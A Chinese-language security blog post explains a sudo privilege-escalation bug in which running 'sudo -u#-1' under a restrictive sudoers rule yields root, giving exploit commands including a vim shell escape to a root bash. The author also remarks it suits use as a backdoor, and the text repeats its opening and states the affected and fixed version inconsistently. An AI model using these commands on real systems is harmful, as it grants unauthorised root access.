注意:本文分享给安全从业人员、网站开发人员以及运维人员在日常工作防范恶意攻击,请勿恶意使用下面介绍技术进行非法攻击操作。。
[TOC]
描述:研究人员在Linux SUDO命令中发现了一个bug,非授权的用户可以利用该bug以root权限运行命令。所以可以利用此漏洞来进行低权限用户的权限提升,亦可以用来进行持续维权;幸好该漏洞不是以标准配置下运行,因此大多数Linux服务器不受影响(所以我才说作后门最合适)。
影响版本: x <= v1.8.28
漏洞利用:在Linux操作系统下执行命令时,非特权的用户可以用sudo命令来以root权限来运行命令,前提是要知道root用户密码或提前被授予权限。
漏洞原理:通过在sudo命令中将UID 设为-1或4294967295来以root权限运行sudo命令,实际这时的Id=0又因为Linux上root的默认uid就是0所以得到root权限
漏洞复现:
1.可以通过在/etc/sudoers配置文件中加入特殊命令来配置Sudo命令为允许用户以其他用户运行命令
注意:本文分享给安全从业人员、网站开发人员以及运维人员在日常工作防范恶意攻击,请勿恶意使用下面介绍技术进行非法攻击操作。。
[TOC]
描述:研究人员在Linux SUDO命令中发现了一个bug,非授权的用户可以利用该bug以root权限运行命令。所以可以利用此漏洞来进行低权限用户的权限提升,亦可以用来进行持续维权;幸好该漏洞不是以标准配置下运行,因此大多数Linux服务器不受影响(所以我才说作后门最合适)。
影响版本: x <= v1.8.28
漏洞利用:在Linux操作系统下执行命令时,非特权的用户可以用sudo命令来以root权限来运行命令,前提是要知道root用户密码或提前被授予权限。
漏洞原理:通过在sudo命令中将UID 设为-1或4294967295来以root权限运行sudo命令,实际这时的Id=0又因为Linux上root的默认uid就是0所以得到root权限
漏洞复现: weiyigeek.top-
1.可以通过在/etc/sudoers配置文件中加入特殊命令来配置Sudo命令为允许用户以其他用户运行命令1
2
3
4
5
6
7
8
9
10
11
12
13
14#比如下面的命令就可以让用户test以其他非root用户来运行/usr/bin/vim和 /usr/bin/id命令。
test ALL = (ALL, !root) /usr/bin/vim
test ALL = (ALL, !root) /usr/bin/id
#比如,下面的命令就用test用户的UID来替代用户名了:
sudo -u#1002 vim
#用sudo -u来指定要运行的用户
比如,下面的命令就利用该漏洞来以root权限启动 /usr/bin/id ,但是test用户的 /etc/sudoers文件中是没有这样的权限的。
sudo -u#-1 id
#实际利用
sudo -u#-1 vim
:!/bin/bash #进入Shell界面
漏洞修复:建议用户尽快升级到1.8.28版本
你好看友,欢迎关注博主微信公众号哟! ❤
这将是我持续更新文章的动力源泉,谢谢支持!(๑′ᴗ‵๑)
温馨提示: 未解锁的用户不能粘贴复制文章内容哟!
方式1.请访问本博主的B站【WeiyiGeek】首页关注UP主,
将自动随机获取解锁验证码。
Method 2.Please visit 【My Twitter】. There is an article verification code in the homepage.
方式3.扫一扫下方二维码,关注本站官方公众号
回复:验证码
将获取解锁(有效期7天)本站所有技术文章哟!
@WeiyiGeek - 为了能到远方,脚下的每一步都不能少
欢迎各位志同道合的朋友一起学习交流,如文章有误请在下方留下您宝贵的经验知识,个人邮箱地址【master#weiyigeek.top】或者个人公众号【WeiyiGeek】联系我。
更多文章来源于【WeiyiGeek Blog - 为了能到远方,脚下的每一步都不能少】, 个人首页地址( https://weiyigeek.top )
专栏书写不易,如果您觉得这个专栏还不错的,请给这篇专栏 【点个赞、投个币、收个藏、关个注、转个发、赞个助】,这将对我的肯定,我将持续整理发布更多优质原创文章!。
最后更新时间:
文章原始路径:_posts/网安大类/PenetrationNote/权限提升/Linux/操作系统自带应用权限提升利用.md
转载注明出处,原文地址:https://blog.weiyigeek.top/2019/9-17-405.html
本站文章内容遵循 知识共享 署名 - 非商业性 - 相同方式共享 4.0 国际协议